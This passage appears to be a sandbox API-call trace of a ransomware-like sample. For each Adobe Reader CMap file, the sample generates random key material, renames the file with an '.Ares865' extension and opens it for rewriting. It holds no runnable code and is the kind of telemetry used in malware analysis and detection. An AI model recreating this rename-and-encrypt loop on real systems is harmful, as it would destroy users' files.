(lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3634) returned 1 [0161.368] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.373] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.373] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.373] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.374] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-2" | out: lpString1="Adobe-GB1-2") returned="Adobe-GB1-2" [0161.374] lstrlenW (lpString="Adobe-GB1-2") returned 11 [0161.374] lstrlenW (lpString="Ares865") returned 7 [0161.374] lstrcmpiW (lpString1="e-GB1-2", lpString2="Ares865") returned 1 [0161.374] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2.Ares865") returned 74 [0161.374] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-2.ares865"), dwFlags=0x1) returned 1 [0161.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.376] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4636) returned 1 [0161.376] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.377] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.377] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.379] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.380] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.380] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.381] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-3" | out: lpString1="Adobe-GB1-3") returned="Adobe-GB1-3" [0161.381] lstrlenW (lpString="Adobe-GB1-3") returned 11 [0161.381] lstrlenW (lpString="Ares865") returned 7 [0161.381] lstrcmpiW (lpString1="e-GB1-3", lpString2="Ares865") returned 1 [0161.381] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3.Ares865") returned 74 [0161.381] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-3"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-3.ares865"), dwFlags=0x1) returned 1 [0161.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-3.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.386] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4635) returned 1 [0161.387] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.392] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.393] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-4" | out: lpString1="Adobe-GB1-4") returned="Adobe-GB1-4" [0161.393] lstrlenW (lpString="Adobe-GB1-4") returned 11 [0161.393] lstrlenW (lpString="Ares865") returned 7 [0161.393] lstrcmpiW (lpString1="e-GB1-4", lpString2="Ares865") returned 1 [0161.393] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4.Ares865") returned 74 [0161.393] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-4"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-4.ares865"), dwFlags=0x1) returned 1 [0161.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.395] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5217) returned 1 [0161.396] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.396] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.396] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.399] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.399] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.400] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-5" | out: lpString1="Adobe-GB1-5") returned="Adobe-GB1-5" [0161.400] lstrlenW (lpString="Adobe-GB1-5") returned 11 [0161.400] lstrlenW (lpString="Ares865") returned 7 [0161.400] lstrcmpiW (lpString1="e-GB1-5", lpString2="Ares865") returned 1 [0161.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5.Ares865") returned 74 [0161.400] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-5"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-5.ares865"), dwFlags=0x1) returned 1 [0161.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.403] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5322) returned 1 [0161.403] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.408] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.409] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.409] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.409] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-GBK-EUC" | out: lpString1="Adobe-GB1-GBK-EUC") returned="Adobe-GB1-GBK-EUC" [0161.409] lstrlenW (lpString="Adobe-GB1-GBK-EUC") returned 17 [0161.409] lstrlenW (lpString="Ares865") returned 7 [0161.409] lstrcmpiW (lpString1="GBK-EUC", lpString2="Ares865") returned 1 [0161.409] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC.Ares865") returned 80 [0161.410] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbk-euc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbk-euc.ares865"), dwFlags=0x1) returned 1 [0161.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbk-euc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93830) returned 1 [0161.413] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.425] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.426] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.426] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.427] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-GBpc-EUC" | out: lpString1="Adobe-GB1-GBpc-EUC") returned="Adobe-GB1-GBpc-EUC" [0161.427] lstrlenW (lpString="Adobe-GB1-GBpc-EUC") returned 18 [0161.428] lstrlenW (lpString="Ares865") returned 7 [0161.428] lstrcmpiW (lpString1="Bpc-EUC", lpString2="Ares865") returned 1 [0161.428] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC.Ares865") returned 81 [0161.428] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbpc-euc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbpc-euc.ares865"), dwFlags=0x1) returned 1 [0161.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbpc-euc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.430] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4226) returned 1 [0161.430] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.436] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.436] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.437] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-H-CID" | out: lpString1="Adobe-GB1-H-CID") returned="Adobe-GB1-H-CID" [0161.437] lstrlenW (lpString="Adobe-GB1-H-CID") returned 15 [0161.437] lstrlenW (lpString="Ares865") returned 7 [0161.437] lstrcmpiW (lpString1="1-H-CID", lpString2="Ares865") returned -1 [0161.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID.Ares865") returned 78 [0161.437] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-cid"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-cid.ares865"), dwFlags=0x1) returned 1 [0161.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-cid.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.439] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2092) returned 1 [0161.440] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.440] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.440] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.445] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.446] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.446] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.447] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-H-Host" | out: lpString1="Adobe-GB1-H-Host") returned="Adobe-GB1-H-Host" [0161.447] lstrlenW (lpString="Adobe-GB1-H-Host") returned 16 [0161.447] lstrlenW (lpString="Ares865") returned 7 [0161.447] lstrcmpiW (lpString1="-H-Host", lpString2="Ares865") returned 1 [0161.447] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host.Ares865") returned 79 [0161.447] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-host"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-host.ares865"), dwFlags=0x1) returned 1 [0161.449] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-host.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.449] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94436) returned 1 [0161.449] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.450] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.450] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.458] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.460] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-H-Mac" | out: lpString1="Adobe-GB1-H-Mac") returned="Adobe-GB1-H-Mac" [0161.460] lstrlenW (lpString="Adobe-GB1-H-Mac") returned 15 [0161.460] lstrlenW (lpString="Ares865") returned 7 [0161.460] lstrcmpiW (lpString1="1-H-Mac", lpString2="Ares865") returned -1 [0161.461] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac.Ares865") returned 78 [0161.461] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-mac"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-mac.ares865"), dwFlags=0x1) returned 1 [0161.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-mac.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4207) returned 1 [0161.463] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.464] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.464] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.468] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.469] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.470] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-GB1-UCS2" | out: lpString1="Adobe-GB1-UCS2") returned="Adobe-GB1-UCS2" [0161.470] lstrlenW (lpString="Adobe-GB1-UCS2") returned 14 [0161.470] lstrlenW (lpString="Ares865") returned 7 [0161.470] lstrcmpiW (lpString1="B1-UCS2", lpString2="Ares865") returned 1 [0161.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2.Ares865") returned 77 [0161.470] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=244619) returned 1 [0161.472] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.494] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.494] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.494] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.498] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-0" | out: lpString1="Adobe-Japan1-0") returned="Adobe-Japan1-0" [0161.498] lstrlenW (lpString="Adobe-Japan1-0") returned 14 [0161.498] lstrlenW (lpString="Ares865") returned 7 [0161.498] lstrcmpiW (lpString1="apan1-0", lpString2="Ares865") returned -1 [0161.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0.Ares865") returned 77 [0161.498] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-0"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-0.ares865"), dwFlags=0x1) returned 1 [0161.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.501] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3523) returned 1 [0161.501] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.502] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.502] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.504] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.505] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.505] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.505] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Japan1-1" | out: 